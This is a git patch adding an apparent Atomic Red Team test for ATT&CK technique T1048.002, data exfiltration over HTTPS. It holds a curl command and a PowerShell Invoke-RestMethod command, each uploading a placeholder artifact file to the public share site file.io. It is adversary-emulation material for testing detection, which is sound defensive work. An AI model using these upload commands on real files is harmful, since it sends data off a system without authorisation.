From 447d5fc601a7399af7b7a299124c3eee40a0be7d Mon Sep 17 00:00:00 2001
From: Daniel Danho <daniel_danho@hotmail.com>
Date: Wed, 17 Nov 2021 11:47:00 +0100
Subject: [PATCH] Implemented initial test for T1048.002 on Linux

---
 atomics/T1048.002/T1048.002.yaml | 48 ++++++++++++++++++++++++++++++++
 atomics/T1048.002/files/artifact |  1 +
 2 files changed, 49 insertions(+)
 create mode 100644 atomics/T1048.002/T1048.002.yaml
 create mode 100644 atomics/T1048.002/files/artifact

diff --git a/atomics/T1048.002/T1048.002.yaml b/atomics/T1048.002/T1048.002.yaml
new file mode 100644
index 00000000..5cd62562
--- /dev/null
+++ b/atomics/T1048.002/T1048.002.yaml
@@ -0,0 +1,48 @@
+---
+attack_technique: T1048.002
+display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
+
+atomic_tests:
+- name:  Exfiltrate data HTTPS using curl
+  description: |
+    Exfiltrate data HTTPS using curl to file share site file.io
+
+  supported_platforms:
+    - windows
+    - macos
+    - linux
+
+  input_arguments:
+    input_file:
+      description: Test file to upload
+      type: Path
+      default: PathToAtomicsFolder/T1048.002/files/artifact
+
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
+
+
+- name:  Exfiltrate data HTTPS using Invoke-RestMethod
+  description: |
+     Exfiltrate data HTTPS using Invoke-RestMethod to file share site file.io
+
+  supported_platforms:
+    - windows
+    - linux
+
+  input_arguments:
+    input_file:
+      description: Test file to upload
+      type: Path
+      default: PathToAtomicsFolder/T1048.002/files/artifact
+
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |-
+      $form = @{ file = Get-item -Path '(#{input_file})'; content_type = 'txt/plain'; autoDelete = 'true'; maxDownloads = '1' }
+      Invoke-RestMethod -Uri https://file.io -Method Post -Form $form
+
diff --git a/atomics/T1048.002/files/artifact b/atomics/T1048.002/files/artifact
new file mode 100644
index 00000000..ce02d75f
--- /dev/null
+++ b/atomics/T1048.002/files/artifact
@@ -0,0 +1 @@
+T1048.002